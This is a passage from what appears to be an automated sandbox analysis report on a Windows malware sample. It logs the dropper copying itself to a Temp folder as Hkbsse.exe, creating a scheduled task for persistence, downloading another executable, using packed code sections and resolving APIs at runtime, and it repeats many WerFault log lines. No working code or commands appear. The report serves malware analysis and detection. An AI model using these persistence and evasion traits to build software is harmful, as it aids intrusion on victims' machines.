                Source: C:\Users\user\Desktop\file.exe -- Code function: 0_2_0041E0D6 push ecx; ret 0_2_0041E0E9
                Source: C:\Users\user\Desktop\file.exe -- Code function: 0_2_0041DA2C push ecx; ret 0_2_0041DA3F
                Source: C:\Users\user\Desktop\file.exe -- Code function: 0_2_02964472 pushad ; iretd 0_2_02964482
                Source: C:\Users\user\Desktop\file.exe -- Code function: 0_2_02964F8A push esi; retf 0_2_02964F8B
                Source: C:\Users\user\Desktop\file.exe -- Code function: 0_2_044DDC93 push ecx; ret 0_2_044DDCA6
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Code function: 23_2_0041E0D6 push ecx; ret 23_2_0041E0E9
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Code function: 23_2_0041DA2C push ecx; ret 23_2_0041DA3F
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Code function: 23_2_02896322 pushad ; iretd 23_2_02896332
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Code function: 23_2_02896E3A push esi; retf 23_2_02896E3B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Code function: 23_2_0449DC93 push ecx; ret 23_2_0449DCA6
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Code function: 33_2_0041E0D6 push ecx; ret 33_2_0041E0E9
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Code function: 33_2_0041DA2C push ecx; ret 33_2_0041DA3F
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Code function: 33_2_02B68632 pushad ; iretd 33_2_02B68642
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Code function: 33_2_02B6914A push esi; retf 33_2_02B6914B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- Code function: 33_2_0452DC93 push ecx; ret 33_2_0452DCA6
                Source: file.exe -- Static PE information: section name: .text entropy: 7.941071191359724
                Source: Hkbsse.exe.0.dr -- Static PE information: section name: .text entropy: 7.941071191359724
                Source: random[1].exe.33.dr -- Static PE information: section name: .text entropy: 7.941071191359724
                Source: 9f93a2.33.dr -- Static PE information: section name: .text entropy: 7.941071191359724
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- File created: C:\Users\user\AppData\Local\Temp\3bca58cece\9f93a2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe -- File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe
                Source: C:\Users\user\Desktop\file.exe -- File created: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                Source: C:\Users\user\Desktop\file.exe -- File created: C:\Windows\Tasks\Hkbsse.job
                Source: C:\Users\user\Desktop\file.exe -- Code function: 0_2_0041C878 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041C878
                Source: C:\Users\user\Desktop\file.exe -- Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe -- Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe -- Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
